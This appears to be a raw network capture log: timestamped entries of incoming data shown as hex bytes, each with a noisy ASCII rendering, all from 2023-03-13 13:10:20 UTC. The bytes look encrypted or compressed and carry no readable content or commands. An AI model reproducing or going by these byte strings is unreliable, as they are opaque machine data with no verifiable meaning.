                            2023-03-13 13:10:20 UTC86INData Raw: e2 b9 67 b3 3b 1b 0a 0c ac a0 f5 a5 6f 33 87 94 50 38 ed c4 5a 87 13 17 91 7c 20 0a 7e 2c f3 50 78 14 27 3c a3 9f af 44 9e cb 99 bc 87 d3 89 4e 2b 8c 87 51 ea 21 cb e3 92 7e d4 74 c1 e3 60 92 47 39 28 eb 2c 93 76 f8 18 6c d4 99 a6 e9 a4 0c 3d 32 6d 44 07 50 fa 00 78 2f 83 80 5d 3f 52 09 69 78 f9 07 2d 0b ac c7 28 d1 e7 2f 8c 1d 4a ef dd c3 95 f6 b4 24 f2 60 e1 53 08 a1 d7 c6 d6 29 aa d1 7c 7b 4b 5d 75 82 4a 24 01 82 ae 5d 3a fb 9a e8 3f 38 67 d3 ae 90 08 34 01 d6 1f cc 42 92 c5 c0 a2 cd 09 3c f2 b1 fc af 71 4b 8d be c7 39 20 83 bf 08 6b bd 96 32 00 7a 35 f1 bf bf a9 f9 02 86 42 8e 61 b4 f8 2c 4c 83 c7 b5 2f 8e 5c 74 67 33 36 a4 6e b1 28 d4 3e 7a 2a e3 0c 48 a5 82 ab b4 3f 1c 01 77 41 5c d4 47 ae 04 01 b3 10 c1 9f 0b fe fc ab 2d d6 91 2d bb 4f 83 ff b0 54
                            Data Ascii: g;o3P8Z| ~,Px'<DN+Q!~t`G9(,vl=2mDPx/]?Rix-(/J$`S)|{K]uJ$]:?8g4B<qK9 k2z5Ba,L/\tg36n(>z*H?wA\G--OT
                            2023-03-13 13:10:20 UTC88INData Raw: 8d 97 7f 14 52 66 04 51 df 76 c8 95 b0 ab 63 d3 24 77 12 d7 1a 0b 64 04 7c 9f 58 0d d7 60 0c 75 40 9f 65 d0 8c 2c 0d 28 a4 e6 7d e6 67 1b 98 52 a5 af db db e6 db a4 0a 67 28 78 75 b1 d6 2d f3 9e 69 03 85 43 58 3e 6b a4 e4 f3 fa 89 8d e4 26 42 b6 98 ed 7a 4b 73 1b 2e 26 d0 10 71 3e 81 c3 b6 4d c8 23 04 e9 13 dd 8c 72 82 d7 7e 56 23 9b eb 15 43 78 44 1f 6c 6a e3 b1 56 6b b7 67 7d 92 43 15 af d6 a8 46 73 e2 a2 91 a9 3e d1 a7 ca 5b d6 9e 80 40 2f 3b 2f d2 07 1b f8 24 04 0c 65 14 bb 0b 1c dd e5 33 1a 30 49 18 cb 82 c9 39 c2 9f 13 df c7 be fa a2 38 22 16 aa e8 84 f3 c8 93 50 c8 1b fb fe 51 7b 70 8f 2b 42 74 7a ab c5 40 bf 8a 7b 4a c6 a3 f3 d7 9a be 25 9b 93 5f 50 3a 2d d9 3a 8e 21 d5 b6 d4 a0 80 d5 de 99 c5 af 59 d3 d1 ca b0 28 82 f4 ae 2b 75 03 ec ea f3 9c 99
                            Data Ascii: RfQvc$wd|X`u@e,(}gRg(xu-iCX>k&BzKs.&q>M#r~V#CxDljVkg}CFs>[@/;/$e30I98"PQ{p+Btz@{J%_P:-:!Y(+u
                            2023-03-13 13:10:20 UTC89INData Raw: 54 60 57 89 1a 70 57 13 48 86 11 0e 57 42 94 b6 42 9c b8 67 42 86 fb 92 21 ed 80 87 53 f5 a4 22 cf 90 51 be b4 bc 1c 95 6e 57 10 b5 b2 40 47 46 f8 12 66 90 9a 80 06 a8 01 3c 2c 6d 42 00 ae fb 2c 7c 2e 89 d0 37 3f 56 1e 97 79 d4 17 1d 1e a7 e2 2f c9 19 2f a0 1f 70 fb fc 08 84 f4 3c 5b 1e 61 e5 a8 09 b6 db ec cb 0e 50 d0 42 78 60 5f c5 69 48 4e ff 91 a7 61 95 cb 9b e8 35 03 6e cb 50 82 14 39 29 1f 1f cc 48 91 aa 70 b3 db 09 1c f8 a2 f3 b9 9e 43 ba 43 c6 02 21 8b b0 09 fa 0b bb 30 21 64 0d 13 bd d5 48 ee fc 83 01 9d 63 9c 6a 07 4c 89 d0 2b 3b 8b 5c 12 76 3b 27 3a 78 cf 81 c3 2d 60 8f 33 04 27 13 82 ba ae 2a 0d ec 7f 6d 46 d5 5e 6b b3 2d a1 18 50 fc 00 b6 eb e3 2a 90 e2 33 97 43 80 f5 83 f6 1f b5 af ed f1 90 73 d7 69 d7 b8 f1 ec 86 1d 89 1c 00 a1 42 5a bd 32
                            Data Ascii: T`WpWHWBBgB!S"QnW@GFf<,mB,|.7?Vy//p<[aPBx`_iHNa5nP9)HpCC!0!dHcjL+;\v;':x-`3'*mF^k-P*3CsiBZ2
                            2023-03-13 13:10:20 UTC90INData Raw: 03 52 9d 7f 0c d1 4a 25 4f 0c 6a 5c ad 9f 29 13 6f 12 e7 7d ea 67 10 54 28 b5 b0 b4 ef ea ca be 37 69 37 57 bf a6 b9 90 e1 8a be 79 94 45 4b 30 68 c7 f4 f9 da 8b 1e cc fb 46 e4 9b e4 c8 70 73 1b 24 58 dd 3c 76 25 bd 70 af 4d ce 3a c9 e9 05 ec 87 05 88 ff e4 8b 23 9d f8 16 54 5e 53 c4 e1 75 a3 61 57 78 a4 05 77 82 50 0e ba e8 ed e3 00 e2 a2 9a 92 35 cf bf 4d 55 db 8f 92 42 08 33 0e 16 1e 0a df 21 0e f9 b6 15 bb 01 2b 0a f3 34 b5 39 56 00 e2 8e d7 34 db 9b 33 df f0 c6 f1 a3 14 2d 11 80 e1 b6 89 3f 82 45 dd 03 25 e8 12 ae 6f 97 2b 4c 5e 70 d1 14 51 aa 9e 94 6b 85 4d f7 f7 d3 78 8f 8a aa 3a dc 53 44 62 1f 8f 2b cc b9 e1 ff 04 d9 cb 99 d5 a9 60 3c f3 f9 8d 3d 86 ac 66 c9 5a 0d 80 e8 f9 e9 43 e5 26 61 a2 a7 56 b6 48 44 82 74 4b 10 df 45 6d da 7e d8 06 41 a7 a0
                            Data Ascii: RJ%Oj\)o}gT(7i7WyEK0hFps$X<v%pM:#T^SuaWxwP5MUB3!+49V43-?E%o+L^pQkMx:SDb+`<=fZC&aVHDtKEm~A
                            2023-03-13 13:10:20 UTC91INData Raw: 96 09 97 8e 87 5d 68 a3 23 e3 96 6d 3b 76 c1 e3 6e 86 d1 c1 a6 82 47 67 74 58 12 a6 8a 66 80 17 ba 20 29 30 6e 38 ea 50 fa 04 7a 32 fe 36 3c 3f 55 22 69 7b c8 10 1d db ac e2 28 d1 e7 2e 8c 1f a5 ec b1 e8 86 f4 b0 4c f7 61 cd 54 75 b6 dc c6 d4 3c 84 b6 50 79 62 77 74 69 48 55 c1 df ae 59 5f b6 64 e8 35 16 64 ff 83 81 3b b8 68 8e 1d cd 42 97 c7 c2 c8 d9 02 17 e5 99 54 b8 8f 40 dc bc c6 2e 2e 80 af 1d ee bd bb 30 2f 7a 65 18 bc c4 45 d1 c2 83 2d b5 64 98 df 04 48 0d ae db 1b 8a 5c 17 67 31 4d 36 6f b1 3d ea 83 6b 12 28 71 4b a4 82 be a0 36 17 84 75 6c 57 d8 46 ee b6 00 b3 14 f6 55 19 ee f6 bf 11 8f 6d 29 19 2a fc fe 99 e5 12 b7 bc 9f ee 6f 72 ff 4e 51 55 f1 e6 f1 1e e7 ac 04 a4 5e 54 dc 24 f7 bd 68 b5 2b 04 67 c2 06 28 61 87 27 18 d8 84 17 1b d0 46 5f c5 ec
                            Data Ascii: ]h#m;vnGgtXf )0n8Pz26<?U"i{(.LaTu<PybwtiHUY_d5d;hBT@..0/zeE-dH\g1M6o=k(qK6ulWFUm)*orNQU^T$h+g(a'F_
                            2023-03-13 13:10:20 UTC93INData Raw: 54 32 ba 51 da e6 e1 c3 bc 95 0b 03 5c b1 b9 c5 2f e0 9b b0 49 7a 42 74 1f bd f1 64 f2 c6 9e 09 e4 37 75 fc 65 e5 39 8c 65 16 3e 5a cd 10 60 30 b3 e1 b6 61 cb 1b c5 e3 11 c8 84 72 8c e2 5a 56 0f 9a f1 10 0a 73 44 57 e5 75 f2 b5 40 86 a5 5a 66 f0 42 04 a9 c2 f9 76 0c e6 a2 8a 85 0c 2e a6 ec 4f d9 83 8a 42 2e 22 16 0d 1a e5 ff 1b 0a d7 b0 02 6d a9 3d 2b 88 27 97 29 4e 94 d5 a8 d6 35 be 2a 12 ce d8 8f 19 b0 10 27 11 a4 e6 69 e7 e4 86 45 c0 01 01 ff 6c 78 70 9e df 5c 52 6b 95 c0 69 f0 6b 7a b4 ec da ee f7 d9 63 ad 9c bb 32 49 0a 2e b6 52 8f 21 df 86 fe bf 98 d0 c7 b2 c7 ba 4c 3b 2e e7 89 2f a2 ad 75 89 7a 3c 7f e9 df 98 dd e6 0d 80 b3 0c 2e 90 d7 09 b5 48 13 07 8d db 54 cb 58 f1 72 42 a1 a8 af 70 4c 96 0c 23 8a 5f 88 8e ac 60 0e 62 02 df f9 f2 b2 b8 5a 05 a3
                            Data Ascii: T2Q\/IzBtd7ue9e>Z`0arZVsDWu@ZfBv.OB."m=+')N5*'iElxp\Rkikzc2I.R!L;./uz<.HTXrBpL#_`bZ
                            2023-03-13 13:10:20 UTC94INData Raw: 4b 7e 8b 21 67 0a 90 8d 1e d1 95 17 32 67 56 13 41 fe 13 7d e8 b0 c0 10 39 59 67 71 78 f8 1e c1 d7 a6 e5 04 d7 e0 41 94 1d 5b f3 0b c8 f3 dc ef ca 24 0c cf 50 0e a5 d8 18 df 18 74 a5 7a 24 98 77 33 6b 48 59 fa 87 70 59 44 ce b1 e8 35 12 66 fb ae 83 3a 36 9f f3 0a 7f 42 99 c5 c0 b3 db 01 17 9a b1 be 06 8f 40 a1 bd c7 2e 2a 83 a4 1f 2f 6b ba 3f 2a 78 1e 1b ae f4 45 f9 14 83 2d bf c8 b4 f2 17 5a 90 c2 9e 18 8a 5c 13 65 22 33 2a 90 b0 15 c8 2f 05 f1 23 0c 42 ae 9b a9 a1 20 04 fa 69 64 a9 dd 68 98 b0 08 dc f4 df 95 12 fd f8 a5 37 db 6a 2c 86 46 9e f3 66 e4 3a b8 bc e3 f9 6a 1d 1e 67 ff 5e ee e0 9f 1e e6 bd 05 bc b6 57 8b 28 fe ab fd b0 0d 0f 78 d1 07 00 b0 83 3e ec db ad 91 4a 21 4e 5e c5 f2 cf be d1 07 4c 56 95 9a 50 77 86 3e b9 7b 05 2d 2c 2f 2b 28 e5 60 ee
                            Data Ascii: K~!g2gVA}9YgqxA[$Ptz$w3kHYpYD5f:6B@.*/k?*xE-Z\e"3*/#B idh7j,Ff:jg^W(x>J!N^LVPw>{-,/+(`
                            2023-03-13 13:10:20 UTC95INData Raw: 58 58 b5 88 45 f9 d6 8d 0d e4 26 71 e5 86 e4 b6 49 73 15 25 49 c9 11 6a 04 aa 1f 21 4d ce 30 b9 f8 02 dd 92 70 8d d4 b2 57 32 98 ee f9 53 52 5e 44 f6 66 e6 b1 46 7d b3 88 6e af 52 2f ab e3 1b 4e 93 36 00 9c a9 79 d2 a7 c6 39 2b 8e 93 5b 20 5c 07 08 06 11 f5 31 7f 20 91 14 b1 64 cf 02 e5 2f 84 2b 62 31 db ac b9 c2 d0 8a 19 ba 4d a9 04 a2 18 20 08 80 65 43 44 cf aa 28 d5 12 03 90 8a 7d 6f 9d 4e 44 7e 69 b4 ed 5b aa 94 8f 40 fb b1 98 0d d8 69 8d b1 75 ec 5e 2b 2f 9a 18 9e 25 b0 82 fe bf 83 1a cc 94 0a b4 62 0d b1 32 07 2b 8a d7 7b 89 74 26 5f e8 fa b0 f6 e4 27 77 b1 82 45 93 19 60 db 29 4a 1c d5 56 4b cb 58 f0 65 40 ce 2c 21 17 65 bc 0d 22 93 6c 9a 88 41 ee 67 61 21 b6 d1 c5 a5 b5 68 d4 a8 64 bf 27 8a f8 8b 7e 3a 08 cb 12 19 17 f4 d7 c2 14 0f 10 72 a1 30 72
                            Data Ascii: XXE&qIs%Ij!M0pW2SR^DfF}nR/N6y9+[ \1 d/+b1M eCD(}oND~i[@iu^+/%b2+{t&_'wE`)JVKXe@,!e"lAga!hd'~:r0r
                            2023-03-13 13:10:20 UTC96INData Raw: c2 3e 0e 24 30 70 97 03 1f 09 a6 e6 47 cc e7 2e 86 6e 45 f9 d7 e2 84 d6 1d e9 ae 66 e5 3d 0a b6 db ee de 3e 54 da 43 72 72 54 7e cf 93 fd ee aa c3 5b 55 cd b3 e7 35 12 6d f3 25 58 9a 31 29 9e 1d cc 44 bb e5 c0 b3 d1 23 89 3a 13 fd 91 e2 48 a1 bb b4 34 28 83 b3 70 8d be ba 3a 00 1d 1a 0e 43 c5 57 07 03 87 35 41 61 eb de 51 44 ec d0 a4 1f 81 58 7c 78 33 36 38 1d af 39 c2 27 68 32 4f d7 ea a2 aa d7 a6 20 13 d7 78 6d 57 d6 57 99 a0 0d 93 74 05 37 1f c6 91 b8 3d ce 47 23 97 43 8b d8 d1 3e b4 b2 96 89 ea 6e 74 d3 46 ff 54 fb cc d1 c0 44 ab 28 cc 4a 56 a1 52 ec bf 6c bd 3f 1a 64 c2 08 73 ba 84 27 18 c9 86 e7 6f ad 4e 5a bb f6 dc bb d5 65 55 4a 6b 91 6f 77 90 2e 9e 6c 1a 24 3b 45 36 3b e0 7d 01 9f 6e 96 67 2f be a8 0e 62 2c a2 e7 b6 ac 05 ca a5 4b a8 95 35 a7 fa
                            Data Ascii: >$0pG.nEf=>TCrrT~[U5m%X1)D#:H4(p:CW5AaQDX|x3689'h2O xmWWt7=G#C>ntFTD(JVRl?ds'oNZeUJkow.l$;E6;}ng/b,K5
                            2023-03-13 13:10:20 UTC97INData Raw: 66 38 a9 17 ad b3 cf 1c 17 d3 00 e7 2a 61 8b fa a2 53 0b b5 fa 07 58 70 5e 6c ff 77 e3 b7 5c a6 ae 70 43 85 56 6b b1 c8 f3 64 c3 e5 88 9b 81 15 c0 a7 c0 48 db d9 93 45 40 22 0d 09 06 1b fe 24 20 d7 90 33 bb 0b 3a 02 e5 25 86 39 43 33 d9 a8 d0 22 2f 8b 3f cd d2 be 0e a3 12 30 fe a1 dc 95 cd ca a9 ae d5 11 01 fa 73 78 61 92 09 42 7c 69 b8 ef 51 b9 a4 86 4b 4e b4 f7 f7 6f 69 87 8d ad 3e 6a ac 2a b6 1f 8f 29 c0 95 00 be a5 d0 cd 9b af 89 45 2d d4 89 8c 2e a2 b0 14 e7 0f 6f 80 e8 f7 85 e6 e8 26 63 a9 7c 46 bf 4b 40 02 85 e8 17 fd 3b 49 cb 5e 83 5e 42 a7 a0 5b 00 68 bc 05 3c 89 a2 9f a4 b8 e9 65 1a bf b7 d1 d0 dc 91 52 03 a2 09 d1 5a c0 e2 75 7b 09 19 cf 0a 4c 1e 1a 28 cb 3e 8d 7b 63 fd e6 5e 97 89 9c d2 bf 5e 5e 6c b1 40 cb b8 9d 71 b4 a3 3b 96 67 03 c4 e1 11
                            Data Ascii: f8*aSXp^lw\pCVkdHE@"$ 3:%9C3"/?0sxaB|iQKNoi>j*)E-.o&c|FK@;I^^B[h<eRZu{L(>{c^^^l@q;g
                            2023-03-13 13:10:20 UTC99INData Raw: ef a1 36 0c 70 c9 4f 04 48 dc ea c5 36 56 ab 61 78 60 5b 31 44 4a 5f e3 bd 2a 58 55 cb 84 e5 26 16 67 c2 aa 94 c6 37 2d ff 1d b7 75 92 c5 c4 a4 f5 58 0f f2 b5 fa a8 8b 57 5f bc eb 2b 01 4e a7 0c 91 bc ab 34 34 71 e0 1b 91 d2 43 fb 79 b3 2c bf 64 bc 9d 28 4e 83 cd 8e 35 89 5c 15 7a 39 25 36 6e a0 3d dd 38 94 13 0e 07 4a b1
                            Data Ascii: 6pOH6Vax`[1DJ_*XU&g7-uXW_+N44qCy,d(N5\z9%6n=8J
                            2023-03-13 13:10:20 UTC99INData Raw: ff 89 a5 20 11 e0 60 7e 53 dc 55 91 ad 0e 4d 11 f2 93 33 e3 e3 aa 2e cc 6f 3d 93 5c 90 06 99 c9 19 b7 c5 d7 e9 6e 76 c2 2b fe 54 f1 f3 9e 08 e2 ac 11 a5 57 44 59 20 da b2 6e cc 68 03 66 c6 38 35 a0 86 27 0d c9 92 9d 72 bc 4a 42 3b e9 f0 be c7 1a 54 5b 6f 9b 6d 7b 9e 3d 1e 71 36 2b 3d 51 18 38 e0 73 7f bc 11 8f 6d 30 af d4 14 60 3d ac e9 ba 44 6b f9 af 43 b5 dc 3e a9 fe 9e b9 3c 7a 71 d8 f0 82 6e 46 79 48 86 15 33 16 28 fd fb ec 1a bf 6e 4f 17 a2 3d 55 71 e3 22 18 ed b9 c3 fb 99 43 ee fe 0d 81 39 5b cf 74 95 3f d5 8d 19 2c dc bc a5 51 96 11 22 c6 5f fa 00 a0 fe f7 96 da 2f ba 17 1a b1 a4 a9 c9 8e 94 8c b7 3b 20 53 04 04 5b dc 07 8f cc bb be 6c e0 06 a0 a1 d4 2b 98 67 28 7f e6 76 16 c4 6e 20 77 55 8d 7a 3e 9c 05 02 02 78 e5 06 d5 75 0f 41 b8 cd f7 b5 cc 85
                            Data Ascii: `~SUM3.o=\nv+TWDY nhf85'rJB;T[om{=q6+=Q8sm0`=DkC><zqnFyH3(nO=Uq"C9[t?,Q"_/; S[l+g(vn wUz>xuA
                            2023-03-13 13:10:20 UTC100INData Raw: 0d ac 12 8f 28 c5 64 ff 93 83 c2 e3 3b d4 ba 4e 01 93 fd a8 2c ab a1 87 88 5e 2f 96 c2 ef 97 f6 ed 3e 95 b0 ae 4d 95 71 c2 ed 5f 40 3d 09 4f 46 cb 51 e7 86 41 8b a3 25 31 7a bd 0d 29 8a 44 93 88 a7 f8 99 60 a0 b5 d1 c3 be b8 59 1f 56 65 93 25 a8 e1 5e e1 12 0b db 79 61 03 0a dc c6 10 82 71 4d dc cc 73 93 82 44 fe a8 63 54 64 d6 45 35 b9 bb be b4 81 1a b7 49 7e aa 9e 11 a9 ba e4 34 40 3a 54 5a d9 ae b4 d8 4c 45 80 b9 bc e7 0d da 9b 4e 5e e6 7f b5 e5 3f 91 0d 2a a1 35 5b 56 04 b2 6a 70 79 14 b8 8b 22 f0 6a d5 86 ae 16 70 62 b2 22 8a eb bb 4c 58 38 60 e2 1d ba ae c9 d9 bd 35 91 60 53 6f 06 c4 4d 89 17 7e 73 82 21 2c 7e 7c 19 7b 93 12 21 57 7c ba ad 4e 9a 9a 71 bc 94 e7 94 21 92 8d 87 5b 53 5a 23 f2 84 69 be b4 32 e3 6a 91 51 2b a3 98 bd 46 5a ee 10 1d 39 9b
                            Data Ascii: (d;N,^/>Mq_@=OFQA%1z)D`YVe%^yaqMsDcTdE5I~4@:TZLEN^?*5[Vjpy"jpb"LX8`5`SoM~s!,~|{!W|Nq![SZ#i2jQ+FZ9
                            2023-03-13 13:10:20 UTC101INData Raw: c3 74 21 97 4a 96 06 99 c9 1f ad 33 fb e8 6e 73 f1 7e f2 54 f8 fa 72 1a ca af 00 b6 45 56 ae 3c 08 bc 40 b5 7b 07 5e a9 fd ff 5e 99 39 15 82 89 c1 18 ae 20 06 a8 c2 cf 8b d5 16 13 49 6b 9b c3 7f 81 38 f6 63 1f 0f 7f 2a 3a 3c f8 89 11 b4 1b 8c 1c 64 bb c7 14 4d 15 b1 e5 b4 ba 7b d0 b0 b5 a3 a8 3d b4 89 be bc 3c 6f 1a eb 0c 83 48 47 63 20 b6 14 22 17 12 c1 e1 d3 1a bf 68 58 0d af d2 51 44 11 21 4f da 93 c1 d4 0b 30 ca f1 1e 81 12 4f e3 5e 85 c1 de aa 10 2d a0 92 a2 3f ba 52 90 c6 59 ef 1d b1 f9 df b7 dc 30 b6 e4 19 e6 82 af cb f1 bb 00 a8 3f 4f 7b 23 d4 d4 d4 5e e6 bc 23 a1 67 f9 14 bc df ff 30 66 6c 06 01 c3 7c 0c d3 69 5b 2d 50 92 70 ed 9e 3f 3e 05 5f e7 75 e0 74 de 6d 74 a6 af d1 dc f3 a5 9b 19 62 3b 52 d5 83 d7 2b e4 89 cf 6d 85 43 5c 30 f7 fa f5 f3 cc
                            Data Ascii: t!J3ns~TrEV<@{^^9 Ik8c*:<dM{=<oHGc "hXQD!O0O^-?RY0?O{#^#g0fl|i[-Pp?>_utmtb;R+mC\0
                            2023-03-13 13:10:20 UTC102INData Raw: 7b 89 78 34 8f e5 f3 93 ec 1a 27 47 a6 80 3c a0 58 60 e9 40 66 7a fd 15 49 cb 52 e6 66 2f 88 a8 21 13 7f b1 0d 2a 9f 52 60 89 82 f8 65 1a bf b7 d1 d0 a5 90 fa 02 a8 6e a9 3d ec cc 77 7f 1c 0c cc 07 44 08 14 28 cb 3e 97 7b 1e cb cf 73 91 9f b2 5e a1 4f 58 7a a3 32 1a bb b1 68 ac a4 33 b3 43 1a eb 61 10 81 ba d3 4d 73 31 50 5d a0 92 84 d9 48 69 d9 96 be ed 03 b3 e2 7c 69 e7 7b 99 8a 15 d2 05 2d 81 23 45 39 2a a0 6a 7a 64 1e da 8b 20 93 94 de aa 8e 14 0b 42 83 21 8e d3 36 53 58 39 61 c7 dc 2b a5 e2 ce 95 a0 87 9e 58 55 1f ab 75 81 17 72 7e 71 20 09 67 a9 1a 7c 6e 12 59 60 55 9f ab 51 b1 98 33 be 87 dd 87 39 95 a3 85 5b e2 46 2e e3 9b 6d 45 8d ed ed 68 ea 62 3b a6 86 2c 66 77 f8 18 6c 12 97 80 1e a1 01 e9 33 41 53 15 2b c9 01 78 32 80 e0 7f 3d 51 02 7f 66 97
                            Data Ascii: {x4'G<X`@fzIRf/!*R`en=wD(>{s^OXz2h3CaMs1P]Hi|i{-#E9*jzd B!6SX9a+XUur~q g|nY`UQ39[F.mEhb;,fwl3AS+x2=Qf
                            2023-03-13 13:10:20 UTC104INData Raw: 0d 18 ad 2c a5 48 41 b4 27 f6 ac 6a a8 5b fc 67 ee 00 2b a4 be 05 ed 25 7e 9f 75 a5 47 4f c1 f9 d9 c8 9d 14 49 42 18 d0 7e 7f 8b 03 e0 70 1a 37 0f 29 2b 8a e1 77 10 1f 10 8f 76 39 b1 ff b5 61 2c a8 f6 b6 a5 67 2b a6 67 b9 87 4e f1 f3 8d b9 14 26 77 c2 04 ab 01 4f 7b 39 b5 0b 03 7d b3 3e e0 f5 01 b1 74 4b 0f b0 cd aa 5c c3 3b 60 a4 f1 c2 ff b1 66 bc f2 1e 8f 11 09 c9 6b 8f c7 cb 99 78 99 da d2 a9 20 b1 36 20 c1 4e 1b 10 9f f0 e8 cf 53 2f b0 e9 1a 97 a9 a5 cb f2 bb 73 b6 13 5a 79 7d 45 50 d5 5a ca d7 b2 a1 6d f5 1d ac df 67 33 66 6c 19 71 f0 7a 12 29 6b 0c 70 52 e9 37 c1 9d 2d 3d 43 7d e7 77 e6 6b 13 2a 81 a5 af d1 d5 e2 c1 b4 1c 7b cf 51 82 a0 c9 0b c8 c8 b6 52 8e 45 40 77 02 f9 f5 f3 c0 86 0d e3 39 7a 1b 9a c8 04 9e 5b 59 26 49 c3 16 6e 18 c6 a8 b6 4d c4
                            Data Ascii: ,HA'j[g+%~uGOIB~p7)+wv9a,g+gN&wO{9}>tK\;`fkx 6 NS/sZy}EPZmg3flqz)kpR7-=C}wk*{QRE@w9z[Y&InM
                            2023-03-13 13:10:20 UTC105INData Raw: 5c 5d d3 37 df 7a 40 ad b0 2a 19 63 a7 f3 22 ac 46 9c f3 9d ef 67 65 8f cd 97 d5 b3 bc 78 a9 a9 64 b5 31 99 8c 5a 7d 16 19 df 01 44 06 10 28 cb 3e 96 7b 1e cb cf 73 91 8a e1 b7 a1 4f 56 73 b7 37 6d d6 bd 60 b3 a7 25 b8 4a 02 ff 61 10 81 b2 d3 4d 73 31 50 5d a0 ea ce 99 49 6d b2 93 97 ef 09 df c8 ad 5e e6 71 8b c8 52 be 05 2d 81 2b 50 56 02 be 94 71 57 34 d5 f0 1a 8b 6a db 84 ad 6d 32 70 82 25 a2 e2 b9 4c 5e 11 ca e3 0c a6 b2 f8 a5 92 31 87 94 4f 48 05 c3 4d 7d 16 54 6a 7e 5b 33 7d 57 1f 3f 51 12 22 59 5e 87 a4 4e 9b a6 8f bd ab d4 91 36 f1 8c 80 44 e1 a4 22 cf 90 51 be b4 30 1d 95 6e 7b 3a b5 b2 47 47 02 f8 12 66 cc 9a 80 06 a8 07 3c 68 6d 4c 0e ae fb 2c 7e 31 95 fa 6d 25 5c 08 60 62 06 15 31 04 aa f4 2f c6 bf 41 84 1c 5b f3 dd f3 8b f6 bb 2a f2 60 e1 5b
                            Data Ascii: \]7z@*c"Fgexd1Z}D(>{sOVs7m`%JaMs1P]Im^qR-+PVqW4jm2p%L^1OHM}Tj~[3}W?Q"Y^N6D"Q0n{:GGf<hmL,~1m%\`b1/A[*`[
                            2023-03-13 13:10:20 UTC106INData Raw: f1 83 b2 d5 ab 21 47 c5 e8 d6 91 9b 14 61 74 69 9b 7a 7d f2 7e e2 70 10 0c 7b 28 2b 3f ca 4d 12 b0 2c 8d 67 29 b8 c4 38 24 2e a8 f0 9b ba 6a c6 97 48 a2 ab 32 b6 f2 85 bd 3c 7a 6a de 04 95 49 66 63 35 b1 3c 70 10 04 39 e7 90 46 bd 7f 41 67 e7 c1 54 5b b7 2a 64 cf e0 c8 f8 b7 66 b2 f2 1e 83 56 13 c9 6b 8f f3 0e a7 3d 34 fb e3 f0 6f ed 17 3e c4 22 8a 10 b3 fe dd a5 dc 33 cd 86 1a 9d b5 84 d5 f7 dc fd b6 3f 4b 50 24 06 52 a8 2e e3 94 b4 8b 74 c3 07 a0 e1 d1 32 66 af 04 7a e1 6b 1f d2 52 62 67 51 92 74 d1 98 36 19 fe 7e cb 75 e8 63 57 49 29 a9 bc de ca fa cf ac e5 63 1d 40 ac df e9 29 e0 8c 54 df 9b 43 58 19 be e1 e6 fc da 9c 08 fb 2f 8f e4 b7 f5 17 a1 30 19 24 4f c1 7f 29 36 a9 15 ba 52 c4 23 10 f8 13 c9 9e 9d 89 d3 b3 55 0b dd fa 07 54 56 f0 45 e1 7f f5 b6
                            Data Ascii: !Gatiz}~p{(+?M,g)8$.jH2<zjIfc5<p9FAgT[*dfVk=4o>"3?KP$R.t2fzkRbgQt6~ucWI)c@)TCX/0$O)6R#UTVE
                            2023-03-13 13:10:20 UTC107INData Raw: a7 48 da d4 b3 a7 5e 10 af 64 ae 20 9c f5 8b 7e 3a 06 c1 1b 40 29 1c d6 ca 39 a9 6e 65 f8 e5 8d 9e 89 9a eb b7 5c 55 6c a8 5a 28 47 b0 4e b8 af 24 9b fb 04 e2 95 1d b3 81 d6 36 51 37 4f 49 5c e8 99 d4 4e 02 f7 b9 bc eb 1a df ff 16 4c e1 7b 8c d5 21 6f 06 01 ad 15 c4 8f a7 a5 42 1d 79 14 d1 8c a5 b0 6a df 87 ac 98 19 fd a2 21 8a c8 93 11 5a 39 6a 91 50 ae a4 e8 b0 a0 20 80 9e 43 44 1a cb a4 82 3b 71 5c 83 de ff 83 48 0b 43 7f 10 33 54 4b 8e 51 4f b0 af 63 ba a7 e3 48 83 fd a4 ea 59 e8 5c 50 64 92 7a b1 a4 9f e1 6a 9b 68 16 59 7d bc 58 64 eb 15 66 1b 9d 9f 1e 40 0b 3b 18 4d 18 ce f2 fd 28 15 34 83 ce 3a 50 11 0a 69 7e 74 2e 1d 09 ad ea a4 eb e7 2e 8d 35 06 fb d7 e2 f5 aa b0 32 06 1b d2 5a 1b b1 dd d7 d7 28 aa d1 7c 7d 60 48 4d 6e 48 4e ee 9d b7 a7 54 e7 99
                            Data Ascii: H^d ~:@)9ne\UlZ(GN$6Q7OI\NL{!oByj!Z9jP CD;q\HC3TKQOcHY\PdzjhY}Xdf@;M(4:Pi~t..52Z(|}`HMnHNT
                            2023-03-13 13:10:20 UTC109INData Raw: 4c 26 17 61 29 39 e6 75 13 b0 48 8d 67 29 b8 c3 38 2a 2e a8 f0 9b d8 75 dc a5 63 f7 86 32 b0 aa 8f 95 75 69 75 c4 61 b9 40 4d 7d bd da 4c 19 50 06 17 b7 fd 1e b9 10 51 08 af c9 43 05 f7 7a 49 c6 ba b8 8b b4 4e f5 da 3c 87 3a 37 bf 6a 85 c5 fe a1 17 3d eb d7 a3 fa be 3d 20 41 59 e5 00 a5 f1 cf 30 de 30 b0 e9 1c 87 4f af e7 e9 8f 61 b7 3f 45 78 2e 53 53 d5 58 8d 24 b0 a1 6d e5 04 bf b9 ca 1a 7a 67 04 70 eb 76 0c d0 72 de 67 7d 84 76 af d5 2b 15 06 57 4d 7c e0 7e 19 43 20 be 87 c7 cb eb c0 ad 10 62 36 47 50 b1 fa 24 e2 e5 fc 50 84 45 b8 95 aa f8 f5 f8 d0 95 06 e4 21 68 1b 9a c8 03 8b 5b 4e 26 49 cf 38 db 35 a9 15 a1 4b d4 2a 3d e4 03 cc 8e 79 83 ff a3 4c dd 9c d4 2d 50 56 13 46 e1 73 8c 8b 55 78 a2 60 69 9c 59 06 81 9d f1 6e 19 ba a0 b3 c8 16 d0 a1 af 70 d9
                            Data Ascii: L&a)9uHg)8*.uc2uiua@M}LPQCzIN<:7j== AY00Oa?Ex.SSX$mzgpvrg}v+WM|~C b6GP$PE!h[N&I85K*=yL-PVFsUx`iYnp
